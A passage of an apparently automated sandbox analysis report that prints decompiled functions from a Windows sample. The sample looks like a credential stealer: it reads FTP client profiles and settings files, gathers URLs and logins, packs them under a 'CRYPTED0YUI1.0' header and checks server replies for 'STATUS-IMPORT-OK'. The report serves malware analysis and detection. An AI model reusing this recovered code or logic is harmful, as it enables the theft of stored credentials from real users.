				E00401000( &_v16, __edx,  &_v16);
				_t66 = 0;
				while(E00403879(_a4, _v16, 0xfa00, 0xa) != 0 && E0040106A(_t39, _t72, _v16) <= 0xfa00) {
					if(E00403973(_t72, _v16) == 0) {
						continue;
					}
					E00401273(_t44, _t72, _v16);
					_t76 =  *_v16;
					( *_v16)[3](_v16, _v8, 0x2134, 0);
					_v12 = 0;
					_t47 = StrStrIA(_v8, "Content-Length:");
					_push(_t66);
					_t48 = _t47;
					if(_t48 != 0) {
						_t86 =  &(_t48[lstrlenA("Content-Length:")]);
						_push(_t86);
						_t87 =  &(_t86[1]);
						asm("repne scasb");
						 *((char*)(_t87 - 1)) = 0;
						_v12 = StrToIntA(_t87);
						_t88 = _t87;
						 *((char*)(_t88 - 1)) = 0xd;
					}
					_pop(_t67);
					_t49 = StrStrIA(_v8, "Location:");
					_t50 = _t49;
					if(_t50 != 0) {
						_t81 =  &(_t50[lstrlenA("Location:")]);
						_push(_t81);
						_t82 =  &(_t81[1]);
						asm("repne scasb");
						 *((char*)(_t82 - 1)) = 0;
						_push(_t82);
						_t50 = E0040294B(_t82);
						_t76 = _a12;
						if(_t76 == 0) {
							_t50 = E004017D5(_t50);
						} else {
							 *_t76 = _t50;
						}
						_pop(_t83);
						 *((char*)(_t83 - 1)) = 0xd;
					}
					_pop(_t66);
					E004012C7(_t50, _t76, _v16);
					if(_v12 <= 0) {
						_v12 = 0xa00000;
					}
					_t54 = E0040106A(E004038EB(_a4, _v16, _v12), _t76, _v16);
					if(_t54 != 0) {
						if(_t54 != 0) {
							_push(_a8);
							_push(_v16);
							if(( *_v16)[0xd]() >= 0) {
								_t66 = 1;
							}
						}
					}
					break;
				}
				( *_v16)[2](_v16);
				E004017D5(_v8);
				return _t66;
			}

0x004039c1
0x004039d3
0x004039da
0x004039df
0x004039e1
0x00403a19
0x00000000
0x00000000
0x00403a1e
0x00403a26
0x00403a35
0x00403a38
0x00403a47
0x00403a4c
0x00403a4d
0x00403a4f
0x00403a5d
0x00403a5f
0x00403a60
0x00403a6a
0x00403a73
0x00403a7e
0x00403a81
0x00403a82
0x00403a86
0x00403a87
0x00403a90
0x00403a96
0x00403a98
0x00403aa6
0x00403aa8
0x00403aa9
0x00403ab3
0x00403abc
0x00403ac0
0x00403ac2
0x00403aca
0x00403acc
0x00403ad3
0x00403ace
0x00403ace
0x00403ace
0x00403ad8
0x00403ad9
0x00403add
0x00403ade
0x00403ae2
0x00403aeb
0x00403aed
0x00403aed
0x00403b0a
0x00403b0c
0x00403b12
0x00403b19
0x00403b1c
0x00403b24
0x00403b26
0x00403b26
0x00403b24
0x00403b12
0x00000000
0x00403b0c
0x00403b33
0x00403b39
0x00403b43

APIs

Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA

Part of subcall function 00401000: CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,0040202B,?,?,?,?,00410BE4), ref: 00401010

StrStrIA.SHLWAPI(?,Content-Length:), ref: 00403A47
lstrlenA.KERNEL32(Content-Length:,00000000,?,Content-Length:), ref: 00403A58
StrToIntA.SHLWAPI(00000001,00000001,00000000,Content-Length:,00000000,?,Content-Length:), ref: 00403A79
StrStrIA.SHLWAPI(?,Location:,?,Content-Length:), ref: 00403A90
lstrlenA.KERNEL32(Location:,00000000,?,Location:,?,Content-Length:), ref: 00403AA1

Strings

Content-Length:, xrefs: 00403A3F, 00403A53
Location:, xrefs: 00403A88, 00403A9C

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$AllocCreateGlobalLocalStream
String ID: Content-Length:$Location:
API String ID: 470334641-2400408565
Opcode ID: b7377cc51f20d8385b9af4971295555af70c5370bc9c8b37470087e9bf613e51
Instruction ID: 7570254d534122b067dba275b6dbafb516b56477de4d3a8d0c02791677091e30
Opcode Fuzzy Hash: b7377cc51f20d8385b9af4971295555af70c5370bc9c8b37470087e9bf613e51
Instruction Fuzzy Hash: BD41B335B04109BBDB11AFA2CC82B9EFF79EF41309F204177B110B62E1DB799A519A58

Uniqueness

Uniqueness Score: -1.00%

Function 0040424A, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040424A() {
				char _v8;
				struct HINSTANCE__* _t4;
				intOrPtr* _t10;
				struct HINSTANCE__* _t15;

				_t4 = GetModuleHandleA("kernel32.dll");
				_t15 = _t4;
				_v8 = 0;
				if(_t4 == 0 || GetProcAddress(_t15, "GetNativeSystemInfo") == 0) {
					L5:
					return 0;
				} else {
					_t10 = GetProcAddress(_t15, "IsWow64Process");
					if(_t10 == 0) {
						goto L5;
					} else {
						 *_t10(GetCurrentProcess(),  &_v8);
						if(_v8 == 0) {
							goto L5;
						} else {
							return 1;
						}
					}
				}
			}

0x00404258
0x0040425d
0x0040425f
0x00404268
0x004042a8
0x004042b1
0x00404279
0x00404286
0x00404288
0x00000000
0x0040428a
0x00404296
0x0040429c
0x00000000
0x0040429e
0x004042a7
0x004042a7
0x0040429c
0x00404288

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00404258
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404270
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00404281
GetCurrentProcess.KERNEL32(00000000,00000000,IsWow64Process,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00404290

Strings

IsWow64Process, xrefs: 0040427B
GetNativeSystemInfo, xrefs: 0040426A
kernel32.dll, xrefs: 00404253

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$CurrentHandleModuleProcess
String ID: GetNativeSystemInfo$IsWow64Process$kernel32.dll
API String ID: 977827838-3073145729
Opcode ID: 85bb568691fe3cf35566aedb2be22b3567b0f5cb7530412735663113f7866611
Instruction ID: 03068760d695a9cd2c9c4a5cba3fee66ffd19866524c567bff6887aa110550f4
Opcode Fuzzy Hash: 85bb568691fe3cf35566aedb2be22b3567b0f5cb7530412735663113f7866611
Instruction Fuzzy Hash: FAF0B4B371020526C75072F9AC46BDF219C87C13A9F290677B611F22C2E9BCCDC04268

Uniqueness

Uniqueness Score: -1.00%

Function 0040D8B9, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D8B9(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v20;
				char* _v24;
				char* _v28;
				char* _v32;
				char _v33;
				char* _v40;
				char* _v44;
				char _v45;
				void* _t28;
				intOrPtr* _t31;
				intOrPtr* _t35;
				void* _t38;
				intOrPtr* _t40;
				void* _t43;
				void* _t52;
				char* _t57;
				char* _t59;

				_t52 = __ecx;
				_t28 = E00401E53(_a8);
				if(_t28 != 0) {
					_t31 = E00401F1B(__eflags, _a8,  &_v20);
					__eflags = _t31;
					if(_t31 != 0) {
						_v24 = E004017EC(_v8);
						E00401823(_v12, _v24, _v8);
						_t57 = _v24;
						while(1) {
							__eflags =  *_t57;
							if( *_t57 == 0) {
								break;
							}
							_t35 = StrStrA(_t57, "<setting name=\"");
							__eflags = _t35;
							if(_t35 != 0) {
								_t59 = _t35 + lstrlenA("<setting name=\"");
								_v28 = _t59;
								_t38 = StrStrA(_t59, 0x4160dc);
								__eflags = _t38;
								if(_t38 != 0) {
									_v33 =  *_t38;
									_v32 = _t38;
									_t40 = StrStrA(_t59, "value=\"");
									__eflags = _t40;
									if(_t40 != 0) {
										_t57 = _t40 + lstrlenA("value=\"");
										_v40 = _t57;
										_t43 = StrStrA(_t57, 0x4160dc);
										__eflags = _t43;
										if(_t43 != 0) {
											_v45 =  *_t43;
											_v44 = _t43;
											 *_v32 = 0;
											 *_v44 = 0;
											E0040D82C(_t52, _a4, _v28, _v40);
											 *_v32 = _v33;
											 *_v44 = _v45;
											continue;
										}
										break;
									}
									break;
								}
								break;
							}
							break;
						}
						E004017D5(_v24);
						return E00401FB0( &_v20);
					}
					return _t31;
				} else {
					return _t28;
				}
			}

0x0040d8b9
0x0040d8c8
0x0040d8ca
0x0040d8dd
0x0040d8dd
0x0040d8df
0x0040d8ed
0x0040d8f9
0x0040d8fe
0x0040d9a9
0x0040d9a9
0x0040d9ac
0x00000000
0x00000000
0x0040d911
0x0040d911
0x0040d913
0x0040d926
0x0040d928
0x0040d936
0x0040d936
0x0040d938
0x0040d93e
0x0040d941
0x0040d94f
0x0040d94f
0x0040d951
0x0040d961
0x0040d963
0x0040d971
0x0040d971
0x0040d973
0x0040d979
0x0040d97c
0x0040d982
0x0040d988
0x0040d994
0x0040d99f
0x0040d9a7
0x00000000
0x0040d9a7
0x00000000
0x0040d975
0x00000000
0x0040d953
0x00000000
0x0040d93a
0x00000000
0x0040d915
0x0040d9b5
0x00000000
0x0040d9be
0x0040d9c7
0x0040d8ce
0x0040d8ce
0x0040d8ce

Strings

value=", xrefs: 0040D944, 0040D957
<setting name=", xrefs: 0040D906, 0040D91C

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: <setting name="$value="
API String ID: 0-3468128162
Opcode ID: 920cccf1eea38dbea6c11ca90c5276b346da53b6dd0d9b6f1c91fb608a0f05e7
Instruction ID: 9c34023bf8df2dae677bc546254fcee4e5c90e439810f2e6e89c6393bea3dfb1
Opcode Fuzzy Hash: 920cccf1eea38dbea6c11ca90c5276b346da53b6dd0d9b6f1c91fb608a0f05e7
Instruction Fuzzy Hash: 3B31B7B2C042599ECF11ABE1CC42AEE7FB49F19354F150067E440B7292E27D4D84DBAD

Uniqueness

Uniqueness Score: -1.00%

Function 00401F1B, Relevance: 10.6, APIs: 7, Instructions: 57
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401F1B(void* __eflags, CHAR* _a4, void** _a8) {
				void* _t11;
				void* _t12;
				void* _t18;
				void* _t20;
				void** _t24;

				_t24 = _a8;
				E00401803(_t24, 0x10);
				_t11 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0, 0);
				 *_t24 = _t11;
				_t12 = _t11 + 1;
				if(_t12 != 0) {
					_t24[3] = GetFileSize(_t12 - 1, 0);
					_t18 = CreateFileMappingA( *_t24, 0, 2, 0, 0, 0);
					if(_t18 == 0) {
						CloseHandle( *_t24);
						 *_t24 = 0xffffffff;
					} else {
						_t24[1] = _t18;
						_t20 = MapViewOfFile(_t18, 4, 0, 0, 0);
						_t24[2] = _t20;
						if(_t20 == 0) {
							CloseHandle(_t24[1]);
							CloseHandle( *_t24);
							 *_t24 = 0xffffffff;
						}
					}
				}
				return 0 | _t24[2] != 0x00000000;
			}

0x00401f1f
0x00401f25
0x00401f3c
0x00401f41
0x00401f43
0x00401f44
0x00401f4f
0x00401f63
0x00401f65
0x00401f98
0x00401f9d
0x00401f67
0x00401f67
0x00401f73
0x00401f78
0x00401f7d
0x00401f82
0x00401f89
0x00401f8e
0x00401f8e
0x00401f94
0x00401f65
0x00401fad

APIs

CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,00000010), ref: 00401F3C
GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000,?,00000010), ref: 00401F4A
CreateFileMappingA.KERNEL32 ref: 00401F5E
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000,00000000,00000000,00000000,?,80000000,00000003), ref: 00401F73
CloseHandle.KERNEL32(?,00000000,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000,00000000,00000000,00000000,?,80000000), ref: 00401F82
CloseHandle.KERNEL32(?,?,00000000,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000,00000000,00000000,00000000,?), ref: 00401F89
CloseHandle.KERNEL32(?,?,00000000,00000002,00000000,00000000,00000000,00000000,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401F98

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseHandle$Create$MappingSizeView
String ID:
API String ID: 3733816638-0
Opcode ID: 59c95c0024b39b49a26cfa13d008d87d8e2c1c3143e065d0beb725acf6b20e2a
Instruction ID: a753e19abee84ff0306ed9f3ec9f6224fb0fe799db7add8b0a1e6242fd717f9b
Opcode Fuzzy Hash: 59c95c0024b39b49a26cfa13d008d87d8e2c1c3143e065d0beb725acf6b20e2a
Instruction Fuzzy Hash: D5117971680301BBEB312F75CC83F553A94BB01718F24C6667654BD1E6E6FC99908A5C

Uniqueness

Uniqueness Score: -1.00%

Function 00408500, Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 190
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408500(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char* _v12;
				intOrPtr _v16;
				char* _v20;
				char* _v24;
				char* _v28;
				intOrPtr _v32;
				void* _t80;
				char* _t87;
				void* _t101;
				char* _t112;
				char* _t137;
				char* _t138;

				_t136 = __edx;
				_v16 = E0040106A(_t80, __edx, _a4);
				if(_v16 >= 0x10) {
					E00401273(_t81, __edx, _a4);
					_v12 = 1;
					_v8 = E00401304(__eflags, _a4,  &_v12);
					__eflags = _v12;
					if(_v12 == 0) {
						L5:
						return 1;
					} else {
						__eflags = _v8 - 2;
						if(_v8 < 2) {
							goto L5;
						} else {
							__eflags = _v8 - 6;
							if(__eflags <= 0) {
								_t87 = E00401304(__eflags, _a4,  &_v12);
								__eflags = _v12;
								if(_v12 == 0) {
									L8:
									return 1;
								} else {
									__eflags = _t87;
									if(_t87 == 0) {
										__eflags = _v8 - 5;
										if(__eflags < 0) {
											_v32 = E00401304(__eflags, _a4,  &_v12);
											E00401388( &_v12, _a4, 4,  &_v12);
										} else {
											E00401388( &_v12, _a4, 0x18,  &_v12);
											_v32 = E00401304(__eflags, _a4,  &_v12);
										}
										E0040809D(_a4,  &_v12);
										__eflags = _v32 - 1;
										if(__eflags == 0) {
											E00408390(_t136, __eflags, _a4, _a8, _v8,  &_v12);
											E0040809D(_a4,  &_v12);
										}
										__eflags = _v12;
										if(__eflags != 0) {
											E00408390(_t136, __eflags, _a4, _a8, _v8,  &_v12);
											__eflags = _v12;
											if(__eflags != 0) {
												_t137 = E00401304(__eflags, _a4,  &_v12);
												while(1) {
													__eflags = _v12;
													if(_v12 == 0) {
														break;
													}
													_t138 = _t137;
													__eflags = _t138;
													if(_t138 != 0) {
														_t101 = E0040143F(_a4);
														__eflags = _t101 - _v16;
														if(_t101 != _v16) {
															__eflags = _v8 - 6;
															if(__eflags >= 0) {
																E00401304(__eflags, _a4,  &_v12);
																E0040809D(_a4,  &_v12);
																E0040809D(_a4,  &_v12);
															}
															_v20 = E0040824E(_t136, __eflags, _a4,  &_v12);
															_v24 = E0040824E(_t136, __eflags, _a4,  &_v12);
															_v28 = E0040824E(_t136, __eflags, _a4,  &_v12);
															__eflags = _v20;
															if(_v20 != 0) {
																__eflags = _v24;
																if(_v24 != 0) {
																	__eflags = _v28;
																	if(_v28 != 0) {
																		__eflags = _v12;
																		if(_v12 != 0) {
																			_t112 = StrStrIA(_v20, "ftp://");
																			__eflags = _t112;
																			if(_t112 == 0) {
																				_t112 = StrStrIA(_v20, "http://");
																				__eflags = _t112;
																				if(_t112 == 0) {
																					_t112 = StrStrIA(_v20, "https://");
																				}
																			}
																			__eflags = _t112;
																			if(_t112 != 0) {
																				E00401486(_a8, 0xbeef0000);
																				E004014E8(_a8, _v20);
																				E004014E8(_a8, _v24);
																				E004014E8(_a8, _v28);
																			}
																		}
																	}
																}
															}
															E004017D5(_v20);
															E004017D5(_v24);
															E004017D5(_v28);
															_t137 = _t138 - 1;
															__eflags = _t137;
															continue;
														} else {
														}
													}
													break;
												}
												return _v12;
											} else {
												return 0;
											}
										} else {
											return 0;
										}
									} else {
										goto L8;
									}
								}
							} else {
								goto L5;
							}
						}
					}
				} else {
					return 1;
				}
			}

0x00408500
0x0040850f
0x00408516
0x00408525
0x0040852a
0x0040853d
0x00408540
0x00408544
0x00408552
0x00408559
0x00408546
0x00408546
0x0040854a
0x00000000
0x0040854c
0x0040854c
0x00408550
0x00408563
0x00408568
0x0040856c
0x00408572
0x00408579
0x0040856e
0x0040856e
0x00408570
0x0040857c
0x00408580
0x004085ad
0x004085b9
0x00408582
0x0040858b
0x0040859c
0x0040859c
0x004085c5
0x004085ca
0x004085ce
0x004085dd
0x004085e9
0x004085e9
0x004085ee
0x004085f2
0x0040860b
0x00408610
0x00408614
0x0040862c
0x0040872e
0x0040872e
0x00408732
0x00000000
0x00000000
0x00408734
0x00408734
0x00408736
0x00408636
0x0040863b
0x0040863e
0x00408645
0x00408649
0x00408652
0x0040865e
0x0040866a
0x0040866a
0x0040867b
0x0040868a
0x00408699
0x0040869c
0x004086a0
0x004086a2
0x004086a6
0x004086a8
0x004086ac
0x004086ae
0x004086b2
0x004086c1
0x004086c1
0x004086c3
0x004086d2
0x004086d2
0x004086d4
0x004086de
0x004086de
0x004086d4
0x004086e3
0x004086e5
0x004086ef
0x004086fa
0x00408705
0x00408710
0x00408710
0x004086e5
0x004086b2
0x004086ac
0x004086a6
0x00408718
0x00408720
0x00408728
0x0040872d
0x0040872d
0x00000000
0x00000000
0x00408640
0x0040863e
0x00000000
0x00408736
0x00408741
0x00408616
0x0040861d
0x0040861d
0x004085f4
0x004085fb
0x004085fb
0x00000000
0x00000000
0x00000000
0x00408570
0x00000000
0x00000000
0x00000000
0x00408550
0x0040854a
0x00408518
0x0040851f
0x0040851f

Strings

ftp://, xrefs: 004086B4
https://, xrefs: 004086D6
http://, xrefs: 004086C5

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: ftp://$http://$https://
API String ID: 0-2804853444
Opcode ID: a9de3c513cf4fe75db66f6004dda229fbde7a4a8d9b20780759a0ebf57d53af8
Instruction ID: fd2999549266695ab435609b8dc0b121c2d8f6895c951fe97b07cddbebe2be1e
Opcode Fuzzy Hash: a9de3c513cf4fe75db66f6004dda229fbde7a4a8d9b20780759a0ebf57d53af8
Instruction Fuzzy Hash: 3561F771800108FEDF11AF91CD41AEEBBB9EB04358F10847BF941B61A1DB398B95DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040E163, Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040E163(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v20;
				char* _v24;
				CHAR* _v28;
				unsigned int _v32;
				intOrPtr _v36;
				void* _t35;
				unsigned int _t38;
				unsigned int _t42;
				intOrPtr* _t45;
				unsigned int _t47;
				char* _t48;
				unsigned int _t55;
				unsigned int _t59;
				char _t66;
				char* _t67;

				_t35 = E00401E53(_a8);
				if(_t35 != 0) {
					_t38 = E00401F1B(__eflags, _a8,  &_v20);
					__eflags = _t38;
					if(_t38 != 0) {
						_v24 = E004017EC(_v8);
						E00401823(_v12, _v24, _v8);
						_t67 = _v24;
						while(1) {
							__eflags =  *_t67;
							if( *_t67 == 0) {
								break;
							}
							_t42 = StrStrA(_t67, "winex=\"");
							__eflags = _t42;
							if(_t42 != 0) {
								_t67 = _t42 + lstrlenA("winex=\"");
								_v28 = _t67;
								_t45 = StrStrA(_t67, "\"/>");
								__eflags = _t45;
								if(_t45 != 0) {
									 *_t45 = 0;
									_push(_t45);
									_push( *_t45);
									_t47 = lstrlenA(_v28);
									__eflags = _t47;
									if(_t47 != 0) {
										_v32 = _t47;
										_v36 = E0040294B(_v28);
										_t55 = E00402A3B(_v36, _v32);
										__eflags = _t55;
										if(_t55 != 0) {
											_v32 = _v32 >> 1;
											_t59 = E004041BC(_v36,  &_v32, 0);
											__eflags = _t59;
											if(_t59 != 0) {
												E00401486(_a4, 0xbeef0001);
												E004014E8(_a4, _v28);
												E004014BC(_a4, _v36, _v32);
											}
										}
										E004017D5(_v36);
									}
									_pop(_t66);
									_pop(_t48);
									 *_t48 = _t66;
									continue;
								}
								break;
							}
							break;
						}
						E00401486(_a4, 0xbeef0002);
						E004014BC(_a4, _v24, _v8);
						E004017D5(_v24);
						return E00401FB0( &_v20);
					}
					return _t38;
				} else {
					return _t35;
				}
			}

0x0040e172
0x0040e174
0x0040e187
0x0040e187
0x0040e189
0x0040e197
0x0040e1a3
0x0040e1a8
0x0040e260
0x0040e260
0x0040e263
0x00000000
0x00000000
0x0040e1bb
0x0040e1bb
0x0040e1bd
0x0040e1d0
0x0040e1d2
0x0040e1e0
0x0040e1e0
0x0040e1e2
0x0040e1eb
0x0040e1ee
0x0040e1ef
0x0040e1f8
0x0040e1f8
0x0040e1fa
0x0040e1fc
0x0040e207
0x0040e210
0x0040e215
0x0040e217
0x0040e219
0x0040e225
0x0040e22a
0x0040e22c
0x0040e236
0x0040e241
0x0040e24f
0x0040e24f
0x0040e22c
0x0040e257
0x0040e257
0x0040e25c
0x0040e25d
0x0040e25e
0x00000000
0x0040e25e
0x00000000
0x0040e1e4
0x00000000
0x0040e1bf
0x0040e271
0x0040e27f
0x0040e287
0x00000000
0x0040e290
0x0040e299
0x0040e178
0x0040e178
0x0040e178

Strings

"/>, xrefs: 0040E1D5
winex=", xrefs: 0040E1B0, 0040E1C6

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: "/>$winex="
API String ID: 0-1498080979
Opcode ID: 9f9330b0a3a858bb5f104b66e8390021cddcbf3b8e479275484bd8ff3157b7fc
Instruction ID: 6ddc7879a2345c95c0110d8438dd60d4332b404bb8441acc01c28196f8b8e54f
Opcode Fuzzy Hash: 9f9330b0a3a858bb5f104b66e8390021cddcbf3b8e479275484bd8ff3157b7fc
Instruction Fuzzy Hash: 05315072D00109AACF126BA2CD02EEE7F75AF54344F14447BF510B51B1D73D8AA1ABA9

Uniqueness

Uniqueness Score: -1.00%

Function 00407F95, Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00407F95(void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				char* _t9;
				void* _t18;
				char* _t19;
				char* _t20;

				_v8 = E0040150D(_a4, 0x20, 0);
				_t20 =  *0x414082; // 0x0
				_t19 =  *0x414086; // 0x0
				if( *_t19 != 0) {
					do {
						_push(StrStrIA(_t20, "FTPCON"));
						_t9 = StrStrIA(_t19, "FTP CONTROL");
						_pop(_t18);
						if(_t9 != 0) {
							L3:
							E00404131(_a4, E00401D69(E0040234A(_t23, _t20), "\\Profiles"), ".prf", 0xbeef0000);
							E004017D5(_t12);
						} else {
							_t18 = _t18;
							_t23 = _t18;
							if(_t18 != 0) {
								goto L3;
							}
						}
						while( *_t20 != 0) {
							_t20 =  &(_t20[1]);
							__eflags = _t20;
						}
						_t20 =  &(_t20[1]);
						asm("cld");
						asm("repne scasb");
						_t25 =  *_t19;
					} while ( *_t19 != 0);
				}
				return E00401553(_t18, _t25, _a4, _v8);
			}

0x00407fa9
0x00407fac
0x00407fb2
0x00407fbb
0x00407fbd
0x00407fc8
0x00407fcf
0x00407fd4
0x00407fd7
0x00407fdd
0x00407ffd
0x00408002
0x00407fd9
0x00407fd9
0x00407fd9
0x00407fdb
0x00000000
0x00000000
0x00407fdb
0x0040800a
0x00408009
0x00408009
0x00408009
0x0040800f
0x00408010
0x00408018
0x0040801a
0x0040801a
0x00407fbd
0x0040802c

APIs

StrStrIA.SHLWAPI(00000000,FTPCON), ref: 00407FC3
StrStrIA.SHLWAPI(00000000,FTP CONTROL,00000000,00000000,FTPCON), ref: 00407FCF

Strings

FTP CONTROL, xrefs: 00407FC9
\Profiles, xrefs: 00407FE3
.prf, xrefs: 00407FF4
FTPCON, xrefs: 00407FBD

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: .prf$FTP CONTROL$FTPCON$\Profiles
API String ID: 0-2908215140
Opcode ID: 50a2e9bfdafcc93abbe3dd01e3f3dab718944d800bd44c445079ad6e10f4cdd6
Instruction ID: b7a8e328a3ee8981745373635da00d8c6f72f6bbf36a454012797349fecb33ea
Opcode Fuzzy Hash: 50a2e9bfdafcc93abbe3dd01e3f3dab718944d800bd44c445079ad6e10f4cdd6
Instruction Fuzzy Hash: 43012870A00605B9DB216772CD02FEF3E5B9BC4328F24443BF849B51E2EA7C5B81869C

Uniqueness

Uniqueness Score: -1.00%

Function 00401944, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60
stringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00401944(void* __ecx, void* __edx, intOrPtr _a4, CHAR* _a8) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v280;
				void* _t26;
				signed int _t40;
				signed int _t42;
				void* _t44;

				_t45 = __edx;
				_t44 = __ecx;
				_t42 = 0;
				_t26 =  &_v8;
				_push(_t26);
				_push(_a4);
				L00410DBE();
				if(_t26 >= 0) {
					_v16 = E0040106A(_t26, __edx, _a4);
					_t26 = GlobalLock(_v8);
					_t47 = _t26;
					if(_t26 != 0) {
						_v20 = _t26;
						_v12 = E004017EC(_v16);
						E00401823(_v20, _v12, _v16);
						GlobalUnlock(_v8);
						E0040185C(_t44, _t47,  &_v280, _a8, lstrlenA(_a8));
						E004012C7(E004018C7( &_v280, _v12, _v16), _t45, _a4);
						_t40 = E0040149B(_a4, "CRYPTED0YUI1.0", 8);
						_t42 = _t40 & E0040149B(_a4, _v12, _v16);
						_t26 = E004017D5(_v12);
					}
				}
				E0040125A(_t26, _t45, _a4);
				return _t42;
			}

0x00401944
0x00401944
0x0040194e
0x00401950
0x00401953
0x00401954
0x00401957
0x0040195e
0x0040196c
0x00401977
0x00401977
0x00401979
0x0040197b
0x00401986
0x00401992
0x0040199a
0x004019b2
0x004019cc
0x004019db
0x004019f0
0x004019f5
0x004019f5
0x00401979
0x004019fd
0x00401a06

APIs

GetHGlobalFromStream.OLE32(?,?,?,?,0041053B,?,Oguqcogtkec,?,?,?,?,00000000,?,?), ref: 00401957
GlobalLock.KERNEL32 ref: 00401972

Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA

GlobalUnlock.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,0041053B,?,Oguqcogtkec,?,?), ref: 0040199A
lstrlenA.KERNEL32(00000000,?,?,?,00000000,00000000,?,?,?,?,?,?,0041053B,?,Oguqcogtkec,?), ref: 004019A2

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Strings

CRYPTED0YUI1.0, xrefs: 004019D3

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Global$Local$AllocFreeFromLockStreamUnlocklstrlen
String ID: CRYPTED0YUI1.0
API String ID: 4083238039-1217275205
Opcode ID: 4c5cc06bacaa2479ed271b920b9ae730032d20091a98701f7782c4e3ac509750
Instruction ID: cad4ecfd6eebefd32ee4a6adb82108f60ef3bcabb282a469145b89e007ee5d21
Opcode Fuzzy Hash: 4c5cc06bacaa2479ed271b920b9ae730032d20091a98701f7782c4e3ac509750
Instruction Fuzzy Hash: 5D11B77590010CBADF027FA2DC428EDBF79EF04348F00817AB555B50B1E77A9AA1AB58

Uniqueness

Uniqueness Score: -1.00%

Function 004103AA, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004103AA(signed int __eax, void* __ecx, signed int __edx, intOrPtr _a4) {
				void* _v8;
				intOrPtr _v12;
				char* _v16;
				void* _t28;
				signed int _t32;

				_t32 = __edx ^ __eax ^ __eax ^ __edx ^ __eax;
				_v16 = 0;
				_t28 = 0;
				_t17 =  &_v8;
				_push(_t17);
				_push(_a4);
				L00410DBE();
				if(_t17 >= 0) {
					_v12 = E0040106A(_t17, _t32, _a4);
					_v16 = E004017EC(_t23 + 1);
					_t17 = GlobalLock(_v8);
					if(GlobalLock(_v8) != 0) {
						E00401823(_t17, _v16, _v12);
						_t17 = GlobalUnlock(_v8);
					}
				}
				E0040125A(_t17, _t32, _a4);
				if(_v16 != 0) {
					if(StrStrIA(_v16, "STATUS-IMPORT-OK") != 0) {
						_t28 = 1;
					}
					E004017D5(_v16);
				}
				return _t28;
			}

0x004103b5
0x004103b7
0x004103be
0x004103c0
0x004103c3
0x004103c4
0x004103c7
0x004103ce
0x004103d8
0x004103e2
0x004103ed
0x004103ef
0x004103f8
0x00410400
0x00410400
0x004103ef
0x00410408
0x00410411
0x00410422
0x00410424
0x00410424
0x0041042c
0x0041042c
0x00410435

APIs

GetHGlobalFromStream.OLE32(?,?), ref: 004103C7
StrStrIA.SHLWAPI(00000000,STATUS-IMPORT-OK,?,?,?), ref: 0041041B

Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA

GlobalLock.KERNEL32 ref: 004103E8
